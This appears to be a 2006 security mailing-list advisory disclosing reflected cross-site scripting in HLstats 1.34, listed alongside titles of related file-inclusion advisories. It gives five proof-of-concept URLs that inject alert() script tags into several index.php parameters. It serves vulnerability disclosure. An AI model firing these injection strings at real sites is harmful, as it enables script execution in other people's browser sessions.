Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[ECHO_ADV_46$2006] ExBB v1.9.1 (exbb[home_path]) Multiple Remote File Inclusion

[SA21659] CubeCart Multiple Vulnerabilities

phpAtm <= 1.21 (include_location ) Remote File Include Vulnerabilities

YACS CMS <= 6.6.1 context[path_to_root] Remote File Include Vuln

From:	MC Iglo <mc.iglo_(at)_googlemail.com>
Date:	31.08.2006
Subject:	XSS in HLstats 1.34

Hello, world ;)

Input passed to multiple parameters in index.php isn't properly
sanitised before being returned to the user. This can be exploited to
execute HTML and script code in a user's browser session in context of
an affected site with limitation of ' and ".
This may also affect prior versions.

Examples:
http://[host]/index.
php?mode=players&game=%3Cscript%3Ealert(123)%3C/script%
3E
http://[host]/index.
php?mode=weaponinfo&weapon=%3Cscript%3Ealert(123)%3C/scri
pt%3E&game=tfc
http://[host]/index.
php?mode=search&q=whatever&st=%3Cscript%3Ealert(123)%
3C/script%3E&game=tfc
http://[host]/index.
php?mode=actioninfo&action=%3Cscript%3Ealert(123)%3C/scri
pt%3E&game=tfc
http://[host]/index.
php?mode=mapinfo&map=%3Cscript%3Ealert(123)%3C/script%
3E&game=tfc

(instead of 'tfc' you should use the game, HLstats is configurated for)

kind regards
MC.Iglo